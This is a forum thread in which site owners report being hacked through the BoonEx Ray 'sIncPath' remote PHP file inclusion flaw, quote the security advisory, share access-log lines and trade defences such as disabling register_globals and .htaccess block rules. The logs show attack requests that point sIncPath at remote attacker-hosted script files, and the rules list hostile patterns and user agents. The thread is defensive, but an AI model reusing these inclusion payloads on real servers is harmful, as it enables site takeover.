BoonEx Ray "sIncPath"

I was hacked with this last night.  Is there a patch in the works for this? OR at least a work around to protect from it?

Title : BoonEx Ray "sIncPath" Remote PHP File Inclusion Vulnerability
Advisory ID : VUPEN/ADV-2008-2033
CVE ID : CVE-2008-3166
CWE ID : CWE-98
Rated as : High Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2008-07-09

Technical Description           

A vulnerability has been identified in BoonEx Ray, which could be exploited by remote attackers to compromise a vulnerable web server [...]

Affected Products

BoonEx Ray version 3.5 and prior

Credits

Vulnerability reported by RoMaNcYxHaCkEr.

ChangeLog

2008-07-09 : Initial release

Vulnerability Management

Subscribe to VUPEN VNS and receive real-time e-mail and SMS alerts when new advisories or patches relevant to your systems and network configurations are available.

Feedback

If you have additional information or corrections for this security advisory please submit them via our contact form.

Here is 1 lilne from my log

118.98.171.118 - - [14/Dec/2008:07:36:18 -0500] "GET //?sIncPath=hxxp://www.tos-belarus.org/data/cyberz.txt??? HXXP/1.1" 302 5 mysite.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "-"

This is unbelievable that this is not being addressed.  I have seen so many of these posts but no one has a fix. 

Is Dolphin still being developed??  Thank God I didn't PAY for this.  With support like this, it would have been a HUGE waste of money.

hi,

I have the same this day, did you solved your problem thanks.

218.234.18.127 www.mysite.fr - [12/Mar/2009:16:55:19 +0100] "GET //?sIncPath=http://www.comosonries.com/sistem.gif??? HTTP/1.1" 200 608 "-" "libwww-perl/5.79"
218.234.18.127 www.mysite.fr - [12/Mar/2009:16:55:21 +0100] "GET //?sIncPath=http://www.comosonries.com/sistem.gif??? HTTP/1.0" 200 608 "-" "Mozilla/5.0"
218.234.18.127 www.mysitee.fr - [12/Mar/2009:16:55:22 +0100] "GET //?sIncPath=http://www.comosonries.com/spread.txt??? HTTP/1.1" 500 557 "-" "libwww-perl/5.79"
201.5.247.144 www.mysite.fr - [12/Mar/2009:17:38:13 +0100] "GET //?sIncPath=super?? HTTP/1.1" 403 179 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7"

hi,

I had a hack attacked from Tengkorak Crew usgin the IncPath.

looking at the logs there was a line such as:

http://www.facecook.org/?sIncPath=http://www.geocities.com/tengkorakcrew@ymail.com/indry.txt?

it seems it was due to register_globals that was not set to off by the host (ovh).

the solution proposed by ovh (http://guide.ovh.net/configphp) is to add the following lines on top of the .htaccess:

SetEnv REGISTER_GLOBALS 0

and it seems it worked.

regards

yann

Sammie,

i got a second hack attack that suceedeed to use my site to perform phishing ... the site is now stopped by the host until i sort out the issue.

the attack seems to use the weakness from the ray/module/global/inc scripts.

i've just tried your solution and hope it will convince the host (ovh). did you get any hack since you've performed the modification ?

thanks

yann

would you have any recommendation for an alternative host?

thanks in advance

yanno

 hostforweb.com is a good choice and also recommended by some of the boonex team

I added this to my .htaccess file.  I haven't done Sammie's fix yet, but will.

I added this at the bottom of the mod_rewrite just before the <IfModule>

##################################
# Block Hacking Attempts - BEGIN #
RewriteCond %{QUERY_STRING} ^.*(chat|inc|modules|plugins|ray).*$
RewriteRule ^.*$ http://127.0.0.1/ [redirect,last]
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/[0-9] [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Python.urllib¦Java/?[1-9]\.[0-9]) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(python[-.]?urllib¦java/?[1-9]\.[0-9]) [NC]
RewriteCond %{REMOTE_ADDR} !^207\.126\.2(2[4-9]¦3[0-9])\.
RewriteCond %{REMOTE_ADDR} !^209\.73\.(1[6-8][0-9]¦19[01])\.
RewriteCond %{REMOTE_ADDR} !^209\.131\.(3[2-9]¦[45][0-9]¦6[0-3])\.
RewriteCond %{REMOTE_ADDR} !^209\.237\.23[2-5]\.
RewriteCond %{REMOTE_ADDR} !^216\.239\.(3[2-9]¦[45][0-9]¦6[0-3])\.
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule !^403.*\.php$ - [F,L]
# Block Hacking Attempts - END #
##################################
</IfModule>

Added this just after the </IfModule>

# deny based on User-Agent
SetEnvIfNoCase User-Agent "^.*libwww-perl" block_bad_bots
SetEnvIfNoCase User-Agent "^.*psycheclone" block_bad_bot

And added this.

order allow,deny
allow from all
deny from env=block_bad_bots

I haven't seen any more hacks since.